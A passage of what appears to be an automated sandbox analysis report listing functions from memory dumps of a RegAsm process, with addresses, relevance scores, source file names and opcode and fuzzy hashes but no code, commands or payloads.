                                                • Source File: 00000004.00000002.3679807113.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_2fb0000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ec783bce289cf8b56971efb071f27750ff0b13286f3a53aa0fd2bcbaf9c74813
                                                • Instruction ID: ed32b34505d261013e8c00cf92570d28183b58f1cea7b8e3c9747eb0bb45c053
                                                • Opcode Fuzzy Hash: ec783bce289cf8b56971efb071f27750ff0b13286f3a53aa0fd2bcbaf9c74813
                                                • Instruction Fuzzy Hash: E401E971C00219DFDB25CF7AC4442EDBBB1AF48354F14C225E824AB290CB744A46CF90
                                                Function 0158D8C8 Relevance: .0, Instructions: 36COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3677288596.000000000158D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0158D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_158d000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c90331a2e339b87b8e71d0176202e2bf26a2805ca8ad2ffddda1f0ea22b560a2
                                                • Instruction ID: fe8587bdd211f4220c41280b42593febdb20cb2d208abc51f217ba49b727f2f1
                                                • Opcode Fuzzy Hash: c90331a2e339b87b8e71d0176202e2bf26a2805ca8ad2ffddda1f0ea22b560a2
                                                • Instruction Fuzzy Hash: 56F0C272004380AEEB208E0ADD84B66FFE8EB41624F18C55AED485F283C3789844CA71
                                                Function 02FB2AF8 Relevance: .0, Instructions: 34COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3679807113.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_2fb0000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ed6fe8a192082b559b21bcdfcb1e1f882c7ce7731caa209ad9939c7e3d7e22be
                                                • Instruction ID: dca1a6d0b31aef41c52aec1c8c03891adf36758f4917d82efd4dbb869652fb9a
                                                • Opcode Fuzzy Hash: ed6fe8a192082b559b21bcdfcb1e1f882c7ce7731caa209ad9939c7e3d7e22be
                                                • Instruction Fuzzy Hash: C401E870D00219DFEB15DF6AC4447EEBAF1BF48394F10C229E924AB290DB744A45CF90
                                                Function 02FB2B89 Relevance: .0, Instructions: 34COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3679807113.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_2fb0000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2b7a26db7385dae9b4ae4e00ff564188fd766ccd7e3cc72f4fcf18e23a445847
                                                • Instruction ID: 471e54004d7f4d3fb2d0be3061294d6622146349546a0aa00b17ca9ea4eb7a04
                                                • Opcode Fuzzy Hash: 2b7a26db7385dae9b4ae4e00ff564188fd766ccd7e3cc72f4fcf18e23a445847
                                                • Instruction Fuzzy Hash: 77F08C32B042186FD3049A5ADC50B6BFBEDFFD9620F15806AE545D7361CAB0AC04C6A4
                                                Function 02FB2C8F Relevance: .0, Instructions: 34COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3679807113.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_2fb0000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4e6fd06d1a6e771f7eebf49b97f829e6cd73eed9380d8a8e17a2b23538620b96
                                                • Instruction ID: dc6a2810804e4d36710f3e6661fc6bfaff473145b3b67bb7bd84fa80fd6d11f1
                                                • Opcode Fuzzy Hash: 4e6fd06d1a6e771f7eebf49b97f829e6cd73eed9380d8a8e17a2b23538620b96
                                                • Instruction Fuzzy Hash: 0FF0A936B101118FD7146A2AF959BA933EAFFDA2A1F144036E906CF320DE66EC428700
                                                Function 02FB0B40 Relevance: .0, Instructions: 31COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3679807113.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_2fb0000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4fef061b3e250c0c5ef37fdf550c3dbea87d32c057c3512fe25ad5c1ab28cd06
                                                • Instruction ID: aa610f8dd02b0547c408f11441c3547d416068caab6ee82c12b9d3bd632d47d2
                                                • Opcode Fuzzy Hash: 4fef061b3e250c0c5ef37fdf550c3dbea87d32c057c3512fe25ad5c1ab28cd06
                                                • Instruction Fuzzy Hash: B7E0ED327002049FC3409A5FE884A7AF7EAFFC8AE4715847CE209CB320DE219C028B40
                                                Function 02FB2B98 Relevance: .0, Instructions: 30COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3679807113.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_2fb0000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: badf4739543b3d8ce2ec0415c8f055924e932cd3fe0d79ec841d7f538378746b
                                                • Instruction ID: 802cc085507d0721b308444d0cfc4adf916b6ea4da7cfeed60ac06dec62c8e05
                                                • Opcode Fuzzy Hash: badf4739543b3d8ce2ec0415c8f055924e932cd3fe0d79ec841d7f538378746b
                                                • Instruction Fuzzy Hash: 90E06D327002186FD3049A5A9C40E6BFBEDFFD9A20B25806EF505D7360CAB0AC0086A4
                                                Function 02FB2DC9 Relevance: .0, Instructions: 30COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3679807113.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_2fb0000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5eecb7df8bce282371a2c8acf5b4d954a82e750511bcc982c9fed6d66f2f53db
                                                • Instruction ID: 0db0f9be59da9434af9e16b593d813c293eb396369e3c42ae794c3f50e62d769
                                                • Opcode Fuzzy Hash: 5eecb7df8bce282371a2c8acf5b4d954a82e750511bcc982c9fed6d66f2f53db
                                                • Instruction Fuzzy Hash: 78F01DB5E1020A9FDB44DFAAC851AAEFFF5BF08240F00846ADA14E7311D7708505CB90
                                                Function 02FB2BD8 Relevance: .0, Instructions: 29COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3679807113.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_2fb0000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c53ba13dafb3e403b61f884d6f9635cf45f44647a4cac20ef0d85fd64869ded8
                                                • Instruction ID: 91b6c055836f026931f33774019cb3d1144bc9fd037afec513f9351a5f89e470
                                                • Opcode Fuzzy Hash: c53ba13dafb3e403b61f884d6f9635cf45f44647a4cac20ef0d85fd64869ded8
                                                • Instruction Fuzzy Hash: FFE04F3A3801146FC3109A2EEC94F5BFBA9EF89775F558026FA49C7760C971EC098664
                                                Function 02FB2CA0 Relevance: .0, Instructions: 29COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3679807113.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_2fb0000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6d1c7ce6339560e597c964eb32999735b8cfe8a461ae7a10128edc9d8c120944
                                                • Instruction ID: d605b46d2370f51b4067f00a1574c07328b001b50ee15170af294d65c1df72e3
                                                • Opcode Fuzzy Hash: 6d1c7ce6339560e597c964eb32999735b8cfe8a461ae7a10128edc9d8c120944
                                                • Instruction Fuzzy Hash: 5FE09235B100118FD715662EF809A6933DAFFD62B1B144035E906CB320DE62DC408340
                                                Function 02FB2DD8 Relevance: .0, Instructions: 29COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3679807113.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_2fb0000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f904185a981b549a8f4ee83a887f7b60e1af61a003a7a12aff70093ff43ab617
                                                • Instruction ID: 9306a64347b0416f381d8f90b38a8635e682185f85b63b3c4df7eafcdc133eeb
                                                • Opcode Fuzzy Hash: f904185a981b549a8f4ee83a887f7b60e1af61a003a7a12aff70093ff43ab617
                                                • Instruction Fuzzy Hash: B3F0DAB4E0420A9FDB44DFAAC851AAEFBF4AF48640F1085AADA19E7350E77095018B90
                                                Function 06D664D1 Relevance: .0, Instructions: 26COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700408844.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d60000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1e2427d163fa2dcc8cb9025cae6fc743cca634c1d893d4f5e8965d53bb7bf154
                                                • Instruction ID: 945eb9295f1d23b527850f1121c0a83f0d104827242715725519df0d97f220b9
                                                • Opcode Fuzzy Hash: 1e2427d163fa2dcc8cb9025cae6fc743cca634c1d893d4f5e8965d53bb7bf154
                                                • Instruction Fuzzy Hash: 8DE02671E192486BEF60CF71CA0572B77BCDB46204F2248B2F406C7202E97BDD028351
                                                Function 02FB2D6F Relevance: .0, Instructions: 24COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3679807113.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_2fb0000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2fb0212e4cfe7b3292aca0e00b659f03d5add79eeb641291c774d1402e986f94
                                                • Instruction ID: 27e7936cd62f68934e77df534f2ca46cd9bdcdc21a913740adcb78508f18f8ad
                                                • Opcode Fuzzy Hash: 2fb0212e4cfe7b3292aca0e00b659f03d5add79eeb641291c774d1402e986f94
                                                • Instruction Fuzzy Hash: 7CE03975D40209DFD740DFA9C904B9EBBF0AF08200F1085AAD426E7311E7748509CF90
                                                Function 02FB2BE8 Relevance: .0, Instructions: 23COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3679807113.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_2fb0000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8498cf1f0b94c5d251ba8f0021f78ba77f3048d115b31337f56b82677721ea6c
                                                • Instruction ID: ebb864e012cb02a3d28c8d17c1990b265e6fd75611b65ee502d792aafb9ab135
                                                • Opcode Fuzzy Hash: 8498cf1f0b94c5d251ba8f0021f78ba77f3048d115b31337f56b82677721ea6c
                                                • Instruction Fuzzy Hash: ABE08C363001046FC3108A0EEC88D0AFBADEFC8770B10802AFA09C7320CA30AC01C6A4
                                                Function 02FB2E68 Relevance: .0, Instructions: 20COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3679807113.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_2fb0000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 943ac83afb20d73dea959d33fafdb39312157c355da4fdab630abfab78577fce
                                                • Instruction ID: 7b12303f62a564d8a313832d16eb5f252e81473ad0b5c1c10ccb1b6f741bc5e0
                                                • Opcode Fuzzy Hash: 943ac83afb20d73dea959d33fafdb39312157c355da4fdab630abfab78577fce
                                                • Instruction Fuzzy Hash: 0ED05E3B2501086FDB01AAB3DC81FD2BBAEAB10B40B484022F644CBA60E611E5299B51
                                                Function 02FB0C01 Relevance: .0, Instructions: 20COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3679807113.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_2fb0000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ae8ce7c04f5063b982a2cd2e34fb2ae278b312b536435330800e7fc2056e2e09
                                                • Instruction ID: 0ab55f114262f11d85e64932ef6560418725c566592a351e8e541ab2e9532f29
                                                • Opcode Fuzzy Hash: ae8ce7c04f5063b982a2cd2e34fb2ae278b312b536435330800e7fc2056e2e09
                                                • Instruction Fuzzy Hash: 49E012B1B40B218B8B35AE39A4416EF77F5AF54A913050E1FE596C3B00DF61E90D8F85
                                                Function 02FB1F60 Relevance: .0, Instructions: 18COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3679807113.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_2fb0000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 18b294dfd5eeadaaf4f65c62adca58f6ed83b84cbf82e2fd4faf4428064a532d
                                                • Instruction ID: 51b4027965880256aa14f88a10ab3c687310b7f71bc4e3d7f997790fb20da52f
                                                • Opcode Fuzzy Hash: 18b294dfd5eeadaaf4f65c62adca58f6ed83b84cbf82e2fd4faf4428064a532d
                                                • Instruction Fuzzy Hash: 22E012361542099BC752DFA9E840E92BBD9AF18754F448461E68489021D721E965EB81
                                                Function 02FB0C08 Relevance: .0, Instructions: 18COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3679807113.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_2fb0000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 62d4c62ee5964a15f73f934b7d3a3b2710457ebc39b6c9662430f56d168fb009
                                                • Instruction ID: f2cc1de595c4510b2b09471de4f5dbcc905c773cea9cb378603a32c71b7b1d38
                                                • Opcode Fuzzy Hash: 62d4c62ee5964a15f73f934b7d3a3b2710457ebc39b6c9662430f56d168fb009
                                                • Instruction Fuzzy Hash: 51D01270700B218B4635AE29A4006DB73E9AF44A913000D1EE656C3B00DB60E90C4B85
                                                Function 02FB2D80 Relevance: .0, Instructions: 18COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3679807113.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_2fb0000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ae2b711c0f8bceeb7cbef03df37a7445a92af2af4e621381d20ba380cdb32fde
                                                • Instruction ID: e8d45513de009ea86cf0c3f1bb578fe5aea85ac6fe5a3915ab72d3a7fe200a31
                                                • Opcode Fuzzy Hash: ae2b711c0f8bceeb7cbef03df37a7445a92af2af4e621381d20ba380cdb32fde
                                                • Instruction Fuzzy Hash: B0E0BFB5D40209DFD740DF79C519B9EBBF1BF08200F118566D515E7311E77496048F91
                                                Function 02FB0310 Relevance: .0, Instructions: 16COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3679807113.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_2fb0000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c2abcb9933f343cded44603073ff92153dc32729e9f8ed88538fd7a0a259d2de
                                                • Instruction ID: 9c964a80eb92a6bbf24c41ecdf2a8efa63a37aa5a0913b7abd9fb880eb6114ab
                                                • Opcode Fuzzy Hash: c2abcb9933f343cded44603073ff92153dc32729e9f8ed88538fd7a0a259d2de
                                                • Instruction Fuzzy Hash: A3D0923210021DBB8F01EE85EC01DEB3B2EEF897A0B108115FE1517221C272E971EBE1
                                                Function 02FB1E11 Relevance: .0, Instructions: 14COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3679807113.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_2fb0000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 806c47e003e2fdaede35581418cf10f5d1d59202359a8e642965943053df7108
                                                • Instruction ID: 42a297dd89d76a49375fd83f01f2c8499e0c5e0934ccf502f5a5137940a00d88
                                                • Opcode Fuzzy Hash: 806c47e003e2fdaede35581418cf10f5d1d59202359a8e642965943053df7108
                                                • Instruction Fuzzy Hash: E5C08C2236112823C514309DA8206DB779FCB8A770F80002BB509877418C86DC0203E9
                                                Function 02FB1E18 Relevance: .0, Instructions: 12COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3679807113.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_2fb0000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c8f1bd6bbd43b922be5399505ab4faa3108c6b22512fc344f598033b657b0d0b
                                                • Instruction ID: 185e1c36b53523d37574550b3baeee6ef4e53248a42100ef97c2990d80c768c2
                                                • Opcode Fuzzy Hash: c8f1bd6bbd43b922be5399505ab4faa3108c6b22512fc344f598033b657b0d0b
                                                • Instruction Fuzzy Hash: 1CB09B3136513417D515319D64205DF768E8B85774F40006BF51D877454CC5DC4203D9
                                                Function 02FB0649 Relevance: .0, Instructions: 9COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3679807113.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_2fb0000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2c63313983d175d637de2f758176d9bd47dcbf1dc590fb4877179657e84a6217
                                                • Instruction ID: 84ea39bca5a681cdcc63d3b6bcdd4c13e7eb6cab534163df97a25050b2893ac0
                                                • Opcode Fuzzy Hash: 2c63313983d175d637de2f758176d9bd47dcbf1dc590fb4877179657e84a6217
                                                • Instruction Fuzzy Hash: F3D0C9B18406454BDF189F54DC483187A51AB52378F7803989068492D2D275C543C7C2
                                                Function 02FB0BEB Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3679807113.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_2fb0000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 68580658d1c1ad9df0b1c1ff3bc689a10fd37b2db11e900f1299e36a7bf2b9c0
                                                • Instruction ID: 793a21d66feec4888b889d25a2202bef378925d43fe9a23c8ad25e0e098123a9
                                                • Opcode Fuzzy Hash: 68580658d1c1ad9df0b1c1ff3bc689a10fd37b2db11e900f1299e36a7bf2b9c0
                                                • Instruction Fuzzy Hash:

                                                Non-executed Functions

                                                Function 06D67700 Relevance: 13.0, Strings: 10, Instructions: 468COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700408844.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d60000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $q$$q$$q$$q$$q$$q$$q$$q$$q$$q
                                                • API String ID: 0-1298971921
                                                • Opcode ID: e21b45d3d85ed04d4fb42b1b1f69e237a25b6c204743355c7ab8a3c12222d5ac
                                                • Instruction ID: e861c94701c969d7e7567546e76dee451293d019225d1d947dede5ed9c7d0f3a
                                                • Opcode Fuzzy Hash: e21b45d3d85ed04d4fb42b1b1f69e237a25b6c204743355c7ab8a3c12222d5ac
                                                • Instruction Fuzzy Hash: CA120B30E00219CFDB68DB69D854AADB7F2FF88304F2485A9E406AB254DB31DD85CF90
                                                Function 06D6A990 Relevance: 10.2, Strings: 8, Instructions: 229COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700408844.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d60000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $q$$q$$q$$q$$q$$q$$q$$q
                                                • API String ID: 0-3886557441
                                                • Opcode ID: 75df3e1c0177d4762072f4c91c72ee192c3cea811a87d9d1aa1cf2b062daf4a3
                                                • Instruction ID: 690aab3ba41e58f10a13f49b673afb1b96fec22c2e259a2a853ea22e5b11e0d4
                                                • Opcode Fuzzy Hash: 75df3e1c0177d4762072f4c91c72ee192c3cea811a87d9d1aa1cf2b062daf4a3
                                                • Instruction Fuzzy Hash: 38914174E1020ADFEB64DF6AE554BAE77F2FF84300F198529E442AB290DB749C45CB90
                                                Function 06D67100 Relevance: 7.9, Strings: 6, Instructions: 405COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700408844.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d60000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $q$$q$$q$$q$$q$$q
                                                • API String ID: 0-2069967915
                                                • Opcode ID: dd3ca8cf5e7f8a8a190fbf4e34a60d434cafb073e1ad676ab3383d4ad53cea7c
                                                • Instruction ID: dab9f513a56381d15b3b89155cfae7fd745f432784d76d2fd395799c29e16540
                                                • Opcode Fuzzy Hash: dd3ca8cf5e7f8a8a190fbf4e34a60d434cafb073e1ad676ab3383d4ad53cea7c
                                                • Instruction Fuzzy Hash: CCF11F34B0020ACFDB68DFA9D454A6EB7B2FF84304F248569E4069B394DB75EC42CB91
                                                Function 06D68438 Relevance: 5.3, Strings: 4, Instructions: 282COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700408844.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d60000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $q$$q$$q$$q
                                                • API String ID: 0-4102054182
                                                • Opcode ID: 9eea384542356318a24efc8970b1a69a2cacfd7fd5dba0a63ff87c02cd9b91a2
                                                • Instruction ID: 3cf223f5c6d746328a627dc67388d74d9a5c23514b5fab8062d1d47e19c8e6d4
                                                • Opcode Fuzzy Hash: 9eea384542356318a24efc8970b1a69a2cacfd7fd5dba0a63ff87c02cd9b91a2
                                                • Instruction Fuzzy Hash: DFB12D30F102098FDB68DBA9D5546AEB7F2FF84300F248569E4069B394DB75DC82DBA1
                                                Function 06D6AD1A Relevance: 5.2, Strings: 4, Instructions: 177COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700408844.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d60000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $q$$q$$q$$q
                                                • API String ID: 0-4102054182
                                                • Opcode ID: 2f56f8e754307108aca380d5dbae05c9f18893d06c433bd8e129f1773f5d9a32
                                                • Instruction ID: 03a64ee99032c0e7e044381b108a2ededb12462199e06c67751d20d122f14982
                                                • Opcode Fuzzy Hash: 2f56f8e754307108aca380d5dbae05c9f18893d06c433bd8e129f1773f5d9a32
                                                • Instruction Fuzzy Hash: E2516D30F102069BDF65DB69E5846AEB3F2FB84310F18856AF855EB241DB35DC42CB91
                                                Function 06D68850 Relevance: 5.2, Strings: 4, Instructions: 168COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700408844.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d60000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LRq$LRq$$q$$q
                                                • API String ID: 0-2204215535
                                                • Opcode ID: aa718a55cedb1104c158cbb22d52c705ff59ccf04d769def0172c5955bec8322
                                                • Instruction ID: 31c69f48939bba517d9cb8993267ae50e513439d5e3f069170f992fba5fcd2b5
                                                • Opcode Fuzzy Hash: aa718a55cedb1104c158cbb22d52c705ff59ccf04d769def0172c5955bec8322
                                                • Instruction Fuzzy Hash: 7A51B530B00205DFDB58EB69E844A6AB7F2FF88714F148569E4069F3A5DB34EC41CBA1